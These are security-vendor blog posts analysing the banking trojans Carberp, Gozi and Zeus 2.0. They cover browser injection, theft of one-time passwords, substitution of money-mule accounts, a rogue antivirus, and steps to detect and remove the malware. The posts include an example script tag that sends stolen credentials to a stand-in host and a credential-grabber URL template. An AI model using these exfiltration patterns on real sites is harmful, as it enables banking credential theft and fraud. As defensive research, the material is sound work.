Man-in-the-browser: The power of JavaScript at the example of Carberp

Carberp hit the scene with a big bang last month targeting financial institutions with transactional two factor authentication schemes and we looked at what Carberp does to an infected system in a previous in-depth report.

Today’s Trojans are normally “just” an enabler for some sophisticated HTML and JavaScript injection into a bank website that is being targeted. The Trojan provides this Man-In-The-Browser capability and the configuration file defines exactly what happens. This is where the real damage is done. In that sense, Carberp follows the same principle as all other transactional Trojans such as Zeus, Gozi, Spyeye, Silon, etc.

While the HTML injection has been fairly static in the past (e.g. an additional ATM Pin input field), the sophistication of the injected JavaScript for Carberp is simply stunning.

Not long after the initial wave of Carberp, we came across another Carberp variant that had a nice small configuration file and as such provided us with the perfect opportunity to showcase Carberp’ s configuration system, how the website injection mechanism works and a few of the most impressing snippets of JavaScript code that was being used.

Credits go to Alex Shipp who reversed engineered some samples including the configuration mechanism. His article can be seen here: http://www.trustdefender.com/trustdefender-labs-blog-carberp-tricks-and-traps-a-technical-overview.html

1 INTRODUCTION

For this report, we looked at two Carberp samples

  • MD5 54f9f6dd8fbbd40ff61ed66fc9a0ac4f which was seen on Nov 15.
  • MD5 2b36b49baec741ba8e82ae32dca19906 which was seen on Dec 1.

As we regularly experience, antivirus detection is pretty bad.

As we’ll see further below, this Carberp sample behaves exactly (!) as all Carberp samples before and I have a hard time understanding why it’s so hard to detect and why it’s so hard to see that this is the Carberp Trojan.</rant>

As we have analysed the Carberp Trojan in very much detail before, we won’t go into any details of how it infects a system and how you can detect it. Please refer to our TrustDefender Labs in-depth report in October for full details.

The payload was distributed from <<REMOVED>> which is a Phoenix exploit kit and it used <<REMOVED>> as its C&C server. The name doesn’t resolve now anymore, so that’s good.

The second sample used <<REMOVED>> as C&C server. Passive DNS reveals that this is also known as <<REMOVED>> [1].

Similarly to previous Carberp Trojans, this sample will download the following plugins

  • /cfg/imp and /cfg/dknew
  • /cfg/passw.plug
  • /cfg/stopav.plug
  • /cfg/miniav.plug

However this particular sample will also download and execute a file from <<REMOVED>>. <<REMOVED>> resolved to <<REMOVED>>

As we’ll find out later, this is a fairly nasty rogue antivirus engine.

1.1 CHANGE IN TACTICS?

Does this constitute a change of tactics for the guys behind Carberp? Are they moving away from their sophisticated attacks on banking websites to generating revenue from Rogue AV engines?

The way they’ll scam for their business, it seems absolutely plausible that they’ll generate a huge amount of revenue through selling rogue AV engines.

2 THE CONFIGURATION FILE

The downloaded /cfg/imp file is the configuration file for this variant and surprisingly this configuration file is really nice and simple and as such it provides a good opportunity to illustrate how Carberp works.

As we know from the last report, Carberp has full control over any HTTP or HTTPS session (EV SSL included) and can inject any kind of additional HTML or JavaScript content into the current page.

This behaviour is nothing special and puts Carberp into the same league as Zeus, Spyeye, URLZone, etc.

The decrypted configuration file looks like this:

This configuration file basically means the following:

  • If the browser goes to any PayPal site (*paypal.com*), inject the attached script into the website, and
  • Add an !deactivated!ONEVENT event to the submit button

Now the injected JavaScript does the following:

  • It will get the email (username) and password from the page and will send these stolen details to the C&C server via https to https://<<REMOVED>>/mv/paypal.com/grabber.php?idt=%user%&name=<EMAIL>%pass=<PASS>
  • Typically browsers have a same domain security setting where no information can be leaked to other domains, but the perpetrators use a technique called ‘JSONP’ where they don’t physically send the information out, they “just” request a JavaScript from a different site with the stolen credentials as parameter! And this is allowed!!!
  • This JavaScript will be called when the user clicks on Login and will obviously also trigger the “real” login to PayPal.

The stolen credentials will be sent to an encrypted site (<<REMOVED>> in our case). When we looked at the certificate, we realized that it is issued to <<REMOVED>>. The experienced reader will recognize that <<REMOVED>> was one of the main C&C servers in the Netherlands in the first wave of Carberp Trojans that caused quite some damage.

Now if we go to the PayPal site, we can see the injection working within the browser:

Obviously this JavaScript runs now within the HTTPS session of PayPal and can potentially cause a whole lot of problems.

This is a perfect example that highlights the base principles of any kind of JavaScript injection into a website via a Trojan. The C&C server actually needs to be HTTPS as otherwise the browser would complain about mixed HTTP and HTTPS content. In addition, the only other thing that’s needed is JSONP, some JavaScript knowledge and in-depth knowledge about the website that is being attacked.

In the next section, we’ll look into some JavaScript examples that were used in the first wave of Carberp attacks that did some really smart things.

3 ADVANCED HTML/JAVASCRIPT INJECTION

The main emphasis of this in-depth report is not the Trojans themselves, but rather to observe what they do to the banking session (HTML) within the web browser. We look in detail at the chosen approach and provide details how they perform their nasty work.

3.1 SOME GENERAL NOTES

You’ll see quite a bit of JavaScript over the next couple of pages and I hope to find the right balance between technical information and understandibility.

The fraudsters behind Carberp spend considerable time not just on the configuration file, but making sure that they have a very flexible and dynamic scheme in place to compromise a banking website. They want to do much more than “just” simple information stealing where some information is sent with the POST request to somewhere. Instead, they want to be able to dynamically send and receive information to steal data even very sophisticated authentication schemes are used.

However in order to do this, information has to be sent to and from malicious hosts via JavaScript. All browsers have a “same domain” security model in place, which basically means that such information can only be sent to the current domain and not to anyone else (to actually prevent exactly these things).

So how can it be that the bad guys are successful in doing dynamic (AJAX) requests to their C&C servers?

The answer is: they don’t. They use a feature known for AJAX as JSONP (or JSON with Padding). That essentially means that they are not even sending any information via AJAX.

What they do is to dynamically create a <SCRIPT> element with all the parameters that are to be sent as parameters. This dynamic element is created via JavaScript. The browser evaluates this as if it would be part of the banking website and you can happily include content from other hosts. The trick here is that the information that is to be sent is just added as HTTP parameter, which means that the Web browser will make a request to this page (with all parameters). The other benefit is that the page even executes any JavaScript that is returned.

Example: Say the Trojan wants to send the username abc and password 123 to their C&C server; they just dynamically add a SCRIPT element as follows:

  • <SCRIPT src=’https://TROJANC&C.com/in.php?username=abc&pass=123></SCRIPT>

The analysed Carberp configuration and JavaScript files provided lots of really sophisticated examples and we just present a few selected ones below.

3.2 PERSISTENT STORAGE

One thing we found quite interesting is the way how the perpetrators implement persistent storage. Persistent storage is needed if you want to save the current account balance for later use.

Internet Explorer actually provides a nice interface for “localStorage” and “globalStorage” that can be used for exactly this purpose.

If that’s not possible (e.g. if you run Firefox), then they simply create a new content element (that’s a <DIV> element called ‘customStorage’) where they store the information.

Access to the persistent store is done via a JavaScript function (called ‘ud’) where you can specify whether you want to read, write or delete the name and the value of the information to be stored together with an expiry.

3.3 EXAMPLE 1: GET THE ACTUAL CASH BALANCE FOR THE CURRENT ACCOUNT

This will copy the available balance from the HTML content id ‘cashTotalAvalBalance’ to the variable “total”. Then it will remove the dollar ($) and comma (,) characters and then call a function “sdata” which does a request to the C&C server with the following parameter:

  • make=auth
  • rix=<timestamp>
  • total=<available cash>
  • idt=<USERID within the Carberp backend>

3.4 EXAMPLE 2: REPLACING THE LOGIN BUTTON WITH A “MALICIOUS” LOGIN BUTTON

  1. This snippet will walk through all form fields and once it finds one called ‘Anmelden’ (German for login) it will save a reference to it.
  2. Then it will create a new input field with exactly the same values (name, type, class, title, value, tabIndex), however it will set an !deactivated!ONEVENT event handler which will now call a malicious function “doLogin” if the user clicks on it.
  3. Then it will insert this newly created button to the page (2nd to last line) and finally will remove the “real” login button (last line)
  4. The doLogin function will take the accountNumber, the pinNumber, the current URL, a Carberp unique userid and a browser identifier and save this into local storage and then will submit the form.
  5. The information in the local storage will then later be used.

3.5 EXAMPLE 3: CHANGE ACCOUNT BALANCE DISPLAY (TO REMOVE FRAUDULENT TRANSACTION AMOUNT)

  1. This JavaScript routine will go through all the tables within the HTML and if the CSS class is either “posSaldo” (positive balance) or “negSaldo” (negative balance), it will save the current balance in the variable “sal”.
  2. Furthermore it will get the fraudulent amount from local storage into the “sd” variable. “nv” is then the correct HTML of the fake amount (obviously the current balance plus the fraudulent amount).
  3. Then it will be written to the HTML (and to make it look nice, the style sheet will be fixed up as well ;-)

3.6 EXAMPLE 4: REMEMBER THE LAST LOGIN DATE AND REPLACE THE “REAL” LAST LOGIN DATE WITH A FAKE ONE

  1. When called, this will walk through the content elements and find the paragraph that contains “Letztes Login” (German for last login).
  2. It will then convert the date and time into a JavaScript variable
  3. The first time, it just store this information in the persistent storage
  4. The second time, it will replace the real date with the saved one from the persistent storage.

3.7 EXAMPLE 5: CHANGE RECIPIENT DETAILS ON FORM SUBMISSION

Ok, this is cool…

The next snippet will be called in exactly the same way we presented in Example 2, meaning the submit button has been replaced and once the user clicks on submit, the following code will execute:

And then this will happen…

  1. In this section, the original recipient details will be saved and the wire transfer form will be located. For our non-German readers (empfaengerName = recipient name, empfaengerKontonummer = recipient account number, empfaengerBlz = recipient bank identifier, betrag = amount, verwendungszweck = reference number)
  2. All these details will be stored in the local storage
  3. The login number, the account number, the amount and the bank identification number will be sent to the C&C server, who will in turn reply with the money mule account details. Now the alertContents function will be called which will change the recipient details on the fly
  4. Now with all the relevant information at hand, Carberp will search for the wire transfer form and
  5. Put the money mule details received by step 3 into the local storage for later use
  6. Carberp makes sure that this wire transfer is executed immediately
  7. Now the recipient details are changed to the money mule details
  8. And finally the form will be submitted and the wire transfer executed

It is worth noting that now the original recipient details and the changed details (money mule) are still in local storage for later use (e.g. change the available account balance)

3.8 EXAMPLE 6: THE MOST WELL-THOUGHT-THROUGH EXAMPLE OF ONE-TIME-PASSWORD TOKEN STEALING

Warning: You’ll be impressed! What can I say… The power of JavaScript…

We’ve all seen so many examples where form fields are changed so that the fraudsters can steal the information they want, but I have never ever seen such a sophisticated token stealing mechanism as employed by the guys behind Carberp. Sophisticated not really in the technical sense, but more from a user design point of view. These guys have spent so much time making sure that users won’t get suspicious.

As you know, OTP’s are only valid once and for a specific time. So the “traditional” approach was to either present a dedicated form to steal a OTP on its own (see e.g. our last Gozi report for such an example).

So this one blew us away and it works as follows[2]:

  • For an authentication page where the user has to provide a OTP, Carberp will hook into the onSubmit of the “Sign on” button
  • It will save all values (including the OTP) and then simulate the look and feel of a new page loading.  This new page says that the token password has expired and the user should please enter another one. The page loading will be stretched to 60 seconds to get a new OTP!
  • The page load simulation is done as follows
    • The status bar will show “Waiting for https://<<URLREMOVED>>…”
  • All content elements will be made invisible (via CSS) and the page loading time will be a simulated 60 seconds.
  • With a timeout function, the content elements keep appearing one by one (exactly how it looks if a page loads slowly)
  • They check all input parameters (including e.g. that the OTP is different than the old one)

4 ROGUE / FAKE ANTIVIRUS ENGINE

This Carberp variant has an interesting twist to it as it will also install a rogue Antivirus Engine. We at TrustDefender Labs are most interested in transactional Trojans so we’ll keep this section short; we can just view it as a kind of a “reverse online fraud” as the bad guys don’t try to turn legitimate wire transfers into fraudulent ones. Instead, they convince you to do execute and authorize the fraudulent transaction directly. No need to steal it at all.

First of all, it pretends to scan the computer just to find a lot of things (as you would guess).

Obviously there are many infections and I can only remove them if I pay (obviously).

$79.95 for a lifetime license + premium support doesn’t seem to be such a bad deal, but somehow I declined to pay this time.

The system is almost unusable if you don’t upgrade as for every single program the following information window will be shown!

So either you pay or the system is almost unusable… I think they make lots of money…

Side note: if you want to see exactly how much they are making, please refer to the great report by Bart Villeneuve from the Information Warfare Monitor: http://www.infowar-monitor.net/reports/iwm-koobface.pdf

SPOILER: “The Koobface mothership maintains daily records of the money earned from affiliate relationships. The daily total for the last seven days is sent to four Russian mobile phone numbers daily. The records of daily totals extend back for nearly one year, from June 23, 2009 to June 10, 2010. During this time, Koobface earned a total income of $2,067,682.69. The daily average income was $5,857.46.”


[1] Credits to BFK for their passive DNS system

[2] Although you have to see it in action…

 

GOZI RELOADED – KING OF EVASION

Over the last couple of weeks / months, there has been quite a bit of interest in transactional Trojans such as Zeus, Carberp, SpyEye and the like. The reason for this was obviously the big success by law enforcement against the perpetrators of these crimes. However such orchestrated action is mostly triggered by success and Zeus has been very successful.

We security researchers know that if one Trojan gets too big, others will step up and stay under the radar to perform their dirty tasks.

Gozi is one of these Trojans that stays fairly under the radar and is able to cause quite a bit of damage within the industry. When we came across a new variant that had a 0% detection rate on Virustotal even though it was virtually doing the same thing as almost one year ago, we were amazed that these guys can manage to evade signature patterns so consistently. As a recap, we looked at Gozi before in February 2010 and the sample we looked at then also had 0% detection rate!!! This is astonishing.

Furthermore, this Gozi variant uses some very interesting characteristics that are worth looking at:

  • Firstly, it uses an encrypted HTTPS connection for its C&C server communication with a valid certificate. This was exclusively done to evade detection and make it harder for the “good guys”. This shows the effort these guys put in to stay undetected.
  • The infection mechanism is still so successful that Gozi didn’t have to change much over the last year. However Gozi was always at the forefront (e.g. Firefox has been supported for a long time).
  • Additionally, this Trojan features extensive client side logic (in JavaScript) and is able to work with many different banking websites to steal static information (such as maiden name, …), and also dynamic password schemes (such as Two-Factor Authentication, One-Time-Password and the like) – very similar to Zeus, SpyEye, Carberp, Silon, etc.
  • This enables real time account takeover that even works with Two-Factor Authentication.

This is a perfect example that the sophistication of these Trojans is increasing rapidly and that the malware problem we face is here to stay.

 

1 INTRODUCTION

Malware samples with 0% detection rate on Virustotal are always very interesting and when we came across a new Gozi variant with 0% detection rate, we simply had to have a more detailed look at this sample.

We have covered the Gozi Trojan in the past; please refer to our in-depth report in February 2010.

The Gozi sample we looked at showed pretty much the same characteristics as the ones we analysed back in February, so this in-depth report will not cover the general details of the Gozi Trojan, but will enable us to focus on the HTML injection part and some interesting enhancements that these guys put into it.

 

2 INSTALLATION & RECAP

We looked at the sample with MD5 3c2892679f682f8a60e78823fd5d3faa which had the following Virustotal detection on Sep 30, 2010 – 0% (0/43)http://www.virustotal.com/file-scan/report.html?id=7d6ee800c86e3a5fdda89412cf77c7d804847d3fe329ea719bf3734c8c9d5ebf-1285832603

After executing the payload, Gozi willcompromize the system as we would expect with a Gozi Trojan. An automated analysis is available here: http://camas.comodo.com/cgi-bin/submit?file=7d6ee800c86e3a5fdda89412cf77c7d804847d3fe329ea719bf3734c8c9d5ebf

2.1 SAME APPCERTDLL APPROACH

Our Gozi installed similar files and used the same AppCertDlls approach to infect the system.

2.2 SAME ADDITIONAL INFORMATION IN THE REGISTRY

The additional information is also present in the same location as in earlier versions.

2.3 SAME C&C COMMUNICATION STRUCTURE

And finally the C&C communication structure stayed the same as well.

2.4 SAME CONFIGURATION FILE ENCRYPTION

The encryption mechanism for the configuration file hasn’t changed so we could easily recover the decrypted configuration file which will be discussed later on in more detail.

2.5 WORKS WITH FIREFOX AND INTERNET EXPLORER, BUT NOT WITH CHROME

As before, it works with Firefox and Internet Explorer; Chrome crashed or doesn’t really start (meaning chrome.exe process gets created but consumes 100% CPU load).

2.6 OFF-TOPIC: WHO COMES UP WITH THE NAMES FOR VIRUSES???

When you submit this sample to Virustotal, you’ll get the following 29 unique virus names (!) in return:

  • Win-Trojan/Papras.116736.G, TR/Carberp.E.5, Backdoor/Win32.Papras.gen, Win32:Carberp-B, Win32:Carberp-B, PSW.Generic8.WPI, Trojan.Generic.KD.44989, TrojWare.Win32.Trojan.Agent.Gen, Trojan.BrowseSpy, Trojan.Win32.Carberp!IK, Trojan.Generic.KD.44989, W32/Papras.B!tr, Trojan.Generic.KD.44989, Trojan.Win32.Carberp, Backdoor/Papras.pm, Backdoor, Backdoor.Win32.Papras.uk, Generic.dx!ubq, Generic.dx!ubq, Trojan:Win32/Carberp.E, Win32/PSW.Papras.BC, W32/Smalltroj.ZKKH, Trojan/W32.Agent.116736.FP, Generic Trojan, Trojan.Gen, Medium Risk Malware, Troj/Gozi-B, Trojan.Win32.Generic!SB.0, Trojan.Gen, Trojan/Papras.bc, TROJ_GOZI.A, TROJ_GOZI.A, Backdoor.Papras.uk, Trojan.Win32.Carberp.116736, Backdoor.Papras.AJM

I understand the generic detection (such as Trojan.Gen), but how can someone detect this as Carberp? This sample doesn’t show any characteristics of Carberp. The AV’s that call this Gozi are actually in the minority here and based on the Antivirus results, I would think it’s Carberp.

Can someone please enlighten me with the naming procedure for viruses?

2.7 CONCLUSION

So altogether, the underlying infection approach is exactly the same as before, which probably means that there was no need yet to change anything as the current approach is effective.  This is further supported by the fact the not a single Antivirus Engine picked up this version Gozi even though the characteristics of what it is doing is exactly the same as almost 1 year ago!!!

3 C&C SERVER

please refer to the full report for details.

 

3.1 Where is <IP removed, available in full report>?

 

3.2 Trusted Web Indicators

As we know, the trouble with any indicators whether a particular website is safe relies on some knowledge about the server. We quickly checked two services and none found the C&C server to be malicious.

 

4 USE OF HTTPS AND SSL CERTIFICATE

We are seeing more and more Trojans that are using SSL and HTTPS to cover their tracks. Additionally more and more Trojans use digital certificates to evade detection. These digital certificates are either obtained fraudulently (by pretending to be someone else) or stolen (stolen private key).

In our case, it’s much worse as the bad guys didn’t have to do anything fraudulent. You can happily get SSL certificates today that are only “domain validated”. This means that (contrary to public belief) nobody has verified the identity of anyone. All the Certificate Authority did was to send an email to someone to prove that the person has access to the domain (e.g. can receive emails to admin@domain.com).

As with all new transactional Trojans, Gozi has the ability to inject arbitrary HTML into any banking website. As discussed in the previous in-depth report in very much detail, Gozi will in many cases make additional requests to the C&C server to download specific information (such as money mule account details, etc.)

This variant of the Gozi Trojan now uses a HTTPS connection to do this. The reasons for doing so are quite obvious.

  • Many infections are detected by their C&C communication. This can be within a proxy log of a corporate environment or on ISP level. By using https, Gozi can evade this detection as only the hostname will appear in theselog files and not the full URL anymore.
  • Full end-to-end encryption. Nobody in the middle can look into the requested information to see whether it is malicious or not. The bad guys are using the same technology that protects us for their own purpose.

 

4.1 THE SSL CERTIFICATE

The certificate used for the server was signed by Equifax Secure Certificate Authority.

However on closer inspection, this certificate was issued from RapidSLL (a subsidiary) without any identity verification and just domain verification.

full details in the in-depth report

5 CONFIGURATION FILE

As we know, the Gozi configuration file is encrypted, but as no changes to the encryption scheme have been made we were able to decrypt the configuration file quickly.

The currently affected financial institutions together with their services are:

  • list of 18 financial institutions (mainly in the US) removed

 

If you are interested in the full configuration file, just drop us an email atlabs@trustdefender.com and we’ll send you a copy.

 

6 HTML INJECTIONS

In this chapter, we’ll look in quite a bit of detail into the HTML injection techniques used by this Gozi configuration. Please note that this HTML injection technique is a feature of the Gozi Trojan (the software), but what exactly is injected (the content) is defined in the configuration file.  This means that Gozi can do whatever the fraudsters want it to do and the presented information below is therefore a characteristics of the configuration file used by Gozi and not Gozi itself.

 

Blog Note: This is actually the main content of this in-depth report, but due to potential sensitive information, this section is only available in the in-depth report. Please don’t hesistate to request a copy of it my emailing labs@trustdefender.com.

7 FURTHER INFORMATION

Further information can be obtained from the team at TrustDefender Labs by emailing us atlabs@trustdefender.com.

 

8 APPENDIX FROM “OLD” FEBRUARY 2010 REPORT

8.1 HOW TO DETECT GOZI

8.1.1 MANUALLY

The best way to detect the presence of the Gozi Trojan is to look in the registry for the presence of the Gozi values. They are all consistently present here:

  • Gozi DLL
    • HKLM\System\CurrentControlSet\Control\SessionManager\AppCertDlls
      • (where you’ll find a reference to the Gozi DLL)
  • Gozi configuration
    • HKCU\Software\AppDataLow\{GUID}
      • (where {GUID} is a globally unique identifier)

8.1.2 TRUSTDEFENDER

Of course, TrustDefender will detect Gozi straight out of the box as it will see the Gozi DLL being injected into the Web browser process.

8.2 HOW TO REMOVE GOZI

As Gozi consists only of the one DLL, one can remove Gozi from the system by removing all related registry entries presented in this report. However, since the Gozi DLL is well hidden, it is not really straightforward to delete the Gozi DLL entries.

First, you have to identify the name of the Gozi DLL (e.g. lnksinfo.dll in our case) and then use a utility such as MoveFile from Sysinternals (http://technet.microsoft.com/en-us/sysinternals/bb897556.aspx) or directly poking the entry with the PendingFileRenameOperations registry key.

After a reboot, the file would have disappeared (you can check with the auto-complete tab trick) and you can verify that the Gozi registry entries are all gone, making your system safe again.

 

Quick update to Carberp

Thanks for all the responses to the in-depth report about Carberp. Wow. We didn’t anticipate such a huge response…

As Carberp has developed quite heavily over the last couple of month and also because there are many different Carberp versions out there, I just wanted to quickly give you an update to our research and answers to many questions we got (that we thought might be interesting for you as well)

  • The Browser Hooking also works for Firefox in various versions (!). We haven’t seen it working for Chrome yet.
  • Carberp was originally a malware that was used to distribute other malware. Especially earlier samples will download additional malware as well.
  • Carberp also has a configuration file system where it can inject arbitrary HTML into any website. This is similar to the configuration file of Zeus and while they can inject anything, we have seen mostly injection of JavaScript that is dynamically sending information to to a server.
    • Similarly to Zeus where the receiving server is an addon to the “normal” C&C Zeus server, Carberp will  send the information to a different server than the C&C server.

We’ll keep an eye on this as this trojan develops (and there is no doubt that it will)

Carberp – a new Trojan in the making

1         Executive Summary

We at TrustDefender Labs have been analysing various transactional Trojans for quite a while, and lately Zeus has been at the top of the class with a massive feature-set and a massive distribution network. Why create a new Trojan if the existing ones are still highly effective?

Well, it seems that there are more and more new players entering the scene, and today we will look at one of the new players in great detail, the very “promising” challenger called Carberp.

This Trojan stands for a new class of Trojans that emerged out of an era of highly successful transactional Trojans such as Zeus, Mebroot and Silentbanker.

Carberp shows an impressive series of evolutionary steps to where it is today with a number of highly interesting features that include

  • Ability to run as non-administrator
  • Ability to infect Windows XP , Windows Vista and Windows 7
  • Will not make any changes to the registry (only in memory modifications)
  • Sophisticated browser hooking to fully control all internet traffic (including HTTPS with EV-SSL)
  • Stolen data is transmitted in real-time to C&C server

We found another fact more interesting from a positioning point of view. It seems that the malware writers are well aware that competing malware is infecting the same computers[1] and we observe a new trend of disabling not just Antivirus engines, but also other Trojans. They will try to disable them to make sure that they don’t interfere (and obviously that the valuable stolen information is not sent to the “competition”).

This Trojan already has a quite impressive feature-set and if it evolves at the same speed as previous Trojans it definitely has the potential to be in the same league as Zeus. But keep in mind that threats only evolve as much as they have to and as security researchers we are always on the lookout for the next greatest technical advancements, but what we learn out from the field is that even phishing is still working fine if used properly.

This Trojan seems to be purpose built and has evolved to where it is today. We anticipate that Carberp will further develop and could morph into a big threat. Hopefully I’ll be proven wrong here but it seems that the bad guys are everywhere and innovating very quickly.

[Update] We will not look specifically into the transactional, HTML overlay techniques this trojan provides similarly to Zeus, Spyeye, Gozi, … as we will cover this in a separate in-depth report.

2         Introduction

We looked mainly at the sample with MD5 07d3fbb124ff39bd5c1045599f719e36 which we obtained from on Wed, Sept 29, 2010. It had a Virustotal detection of 21/41 on the 29th (http://www.virustotal.com/file-scan/report.html?id=61f97c771822ea8c2de0c328d4887febe3fae289e80a0b6caf7768742ae2240f-1285773812).

The sample is packed with ASPack and even though it was a decent detection (well, we consider 51% detection a decent detection), at least four out of the big 6 Antivirus Engines didn’t pick it up.

Furthermore most of the detections were generic ones as this sample was packed with ASPack. Actually only two had a non-generic detection (4.8%).

A static analysis by Threatexpert helps us determining what it is doing on a high level (http://www.threatexpert.com/report.aspx?md5=07d3fbb124ff39bd5c1045599f719e36)

2.1       Additional samples

In addition to the sample above, we looked at the following Carberp samples that date back to June 2010.

However these samples did not provide the three plugins mentioned later on in this report, but just a single “grabber” plugin

2         Confusion in regards to the naming of Carberp

There seems to be quite a bit of confusion within the Antivirus community in determining what Carberp is or is not. While doing our research, we have come across a number of samples where at least one Antivirus Engine detects Carberp while the sample is either Zeus or something completely different.

We have learned already in the previous chapter that it is not yet a well-known Trojan and many Antivirus Engines only detect it using heuristics (which will give you very cryptic names).

more details in the in-depth report.

3         Role of geographic IP

It is quite common these days that distribution and execution of Trojans are very heavily geographic based. Based on the client IP address, the C&C servers will determine whether to infect a system at all or how to behave. We have seen geographic detection tools quite heavily for Mebroot and also Zeus.

While we haven’t noticed a different behaviour based on the geographic location, we received the following error message while doing some research. GeoIPCity.dat was a free geographic database provided by Mastermind.

4         Internet Requests

After installation, Carberp will automatically make a few requests to the internet to download additional files.

Our sample had a hard-coded C&C server at <<<HOST>>> which according to whois.sc is registered in March 2010 (!).

For more details please refer to the in-depth report.

4.1       1st request: Transmission of a unique ID

The first internet request will transmit a unique ID of the computer to the C&C server (POST /set/task.html with id)

After that, the id will always be used for any transmissions to the C&C server.

4.2       2nd request: Upload of all running processes

The next request is an upload of all running processes. Carberp performs a POST request to /set/first.html with the following parameters (this might differ from computer to computer)

  • <<NUMBER>>&os=Windows XP Service Pack 3&plist=system,smss.exe,csrss.exe,winlogon.exe,services.exe,lsass.exe,vmacthlp.exe,svchost.exe,svchost.exe,msmpeng.exe,svchost.exe,svchost.exe,svchost.exe,spoolsv.exe,svchost.exe,vmtoolsd.exe,explorer.exe,vmupgradehelper.exe,vmwaretray.exe,vmwareuser.exe,msseces.exe,ctfmon.exe,alg.exe,wscntfy.exe,wuauclt.exe,procmon.exe,wmiprvse.exe,wireshark.exe,dumpcap.exe,svchost.exe,svchost.exe

4.3       3rd request: Download of additional binary files

Immediately after that, Carberp will additionally download three more files

  • GET /cfg/passw.plug HTTP/1.1
    • Size: 681,835
    • MD5: 21ca03e809a418abc36a32630ac62b73
  • GET /cfg/miniav.plug HTTP/1.1
    • Size: 581,200
    • MD5: a041b68ce03e4918706ce3837c3c4e56
  • Get /cfg/stopav.plug HTTP/1.1
    • Size: 487,035
    • MD5: 8d761ecbae90de25d5165d8aac4fb585

We will look at these file in more detail later on in this report.

5         Installation

After execution, Carberp will create a number of temporary files in the %TEMP% directory (c:documents and settings<USER>Local SettingsTemp on Windows XP) or c:users<USER>AppDataLocalTemp).

Carberp does not need to have administrator rights to run and operate, in fact the Trojan is very careful not to create any files or use anything so that it would need administrator privileges.

While this very disturbing fact means that the Trojan will natively run on locked down machines, as well as on Windows Vista and Windows 7, it also means that the Trojan will only infect the currently logged on user. It will not infect any other user or any kernel component of the system at all.

It follows a similar approach as the Zeus Trojan where it is much more important to spread the Trojan on the newer Windows Operating Systems and this is very disturbing news.

On our system, Carberp created the following files

  • %temp%F.tmp
  • %temp%/10.tmp
  • %temp%/11.tmp
  • %temp%/~TM12.tmp
  • %temp%/~TM13.tmp
  • %temp%/14.tmp

5.1       Execution

Available in the in-depth report

6         Windows / Browser Hooks

Carberp will hook the Export table of a number of WININET.dll and USER32.dll functions. The most important ones being

  • WININET.dll
    • InternetReadFile
    • InternetCloseHandle
    • HttpSendRequestA/W
    • InternetReadFileExA/W
    • HttpSendRequestExA/W

More details available in the in-depth report.

7         Hidden files (for activation after restart)

As the Trojan won’t make any permanent changes to the system, Carberp needs to make sure that it is re-activated after a system restart.

It is performing this task by copying itself to the Startup section of the currently logged on user (c:documents and settings<USER>Start MenuProgramsStartup) with chkntfs.exe in our case. The MD5 is exactly the same as the initial dropper itself.

However the file is hidden from the operating system and you won’t find it with the Windows Explorer or even with the command line. Even the “old” tab-complete trick doesn’t work and this file is really completely invisible.

Special tools such as GMER can make it visible

8         Internet traffic interception (stealing of real-time data)

As discussed before, Carberp has full visibility and control over any internet transactions and it will send off every single password, one-time-token, … for every single login in real-time. It is one of these new Trojans that won’t just collect the data and use it much later, it will send the information out of the computer before it is sent to the real recipient (e.g. our bank).

More details in the in-depth report

9         Detection

This Trojan is very hard to detect without external tools… Obviously TrustDefender detects and protects against it straight out of the box.

The best way to spot a detection is to use the process explorer from Microsoft’s Sysinternals tools (www.sysinternals.com).

Once you start procexp.exe, click on the explorer.exe process and select “View” from the menu and choose “Show Lower Pane”.

At the end of the list, in the “Thread” section, check to see whether there are any threads in a <non-existent Process>. If yes, you are infected. If no, you should be ok from Carberp.

10    Downloaded modules (miniav.plug, passw.plug, stopav.plug)

While we still analyse and work through these downloaded components, we have seen two of these plugins before and they were designed to disable current Antivirus Protection (stopav.plug) and check for the existence of other trojans (miniav.plug). We have seen detection routines for Zeus and Limbo.

While we are still working on the details, this highlights an interesting approach that the Trojan writers are using. They know that if they can compromise a computer, chances might be high that there is already another Trojan running on this machine and they want to make sure that

  • multiple different Trojans do not interfere with each other
  • the same stolen credentials will not be sent to multiple C&C servers as this would decrease the value and the uniqueness of the data.

11         Appendix: How does TrustDefender deal with it?

The TrustDefender Agent will fully detect and protect against Carberp in various ways straight out of the box. TrustDefender doesn’t need signatures or pattern updates and our online transaction security solution was designed to protect the user and the financial institution right from the start.

More information can be found in the in-depth report or please contact us at info@trustdefender.com


[1] well, if you didn’t care about your security, chances are high that you get infected multiple times

Zeus 2.0 – Zeus trojan at its best – extending its reach to Windows Vista, 7 and Mozilla Firefox

In-depth report availableIntroduction

Well, here we are again… After the gang behind Zeus released a new major release of the Zeus Trojan (dubbed Zeus v2), it has received quite a bit of media attention. Our report provides an in-depth look at this new threat from a technical level to provide interested parties detailed information what Zeus v2 does and how it performs its dirty tasks.

Although we have covered the Zeus Trojan in the past, we are once again amazed by the innovation and the effort the bad guys have put in place to keep ahead of traditional security initiatives that do not involve the user’s desktop.

These “advancements” can be grouped into two broad categories; development of the core Zeus platform (Trojan and backend) and development of additional functionalities (such as an instant messaging notification capacity and an extensive JavaScript engine for dynamic challenge/response harvesting and real-time activities).

Although both of these categories are equally disturbing, this post will focus on advancements of the Zeus Trojan core platform that have enabled Zeus to target Firefox users as well as run on newer operating systems that have extensive security features inbuilt into them to make life for such Trojans much harder, namely Windows Vista and Windows 7.

These inbuilt hardening features are a result of Microsoft’s development over the past few years in a response to the proliferation of such Trojans targeting their operating systems and browser. We just hope that other vendors are as equally prepared as the bad guys start turning their attention to them with new variants of the respective Trojans.

In addition, these advancements clearly show how the bad guys are willing to adopt new strategies in response to market trends. The more success Firefox has, the more of a target it is going to be. A recent study noted that the market share of Internet Explorer had fallen below 60%[1], and since then we have seen the bad guys trying to increase their market share by targeting Firefox.

Although we have previously seen custom built Zeus Trojans that have such enhancements enabled, these features are now in the core Zeus binary with “official” support and maintenance. This means that these previously custom features are now available to everybody and we believe there will be a big surge of Zeus activity as a result.

In the next part of the Zeus in-depth reports we will look more closely at the “additional” features of Zeus, namely advanced configuration file options and the extensive JavaScript engine for dynamic challenge/response harvesting and real-time activities.

This blog contains some information available in our in-depth report that is available on request by sending an email to labs@trustdefender.com.

SOCKS proxy

Installation

Upon installation on Windows XP, we noticed that we did get a warning from the operating system, as depicted below:

This is the default dialog if a program wants to listen and accept connections on the computer; however we haven’t seen this dialog even with previous Zeus variants as they were running as administrators where it was possible to get around this notification.

The interesting thing here is that Windows is asking the user to unblock the Windows Explorer program. There is no reference to any third-party software or anything suspicious, thus making this confirmation actually look fairly legitimate.

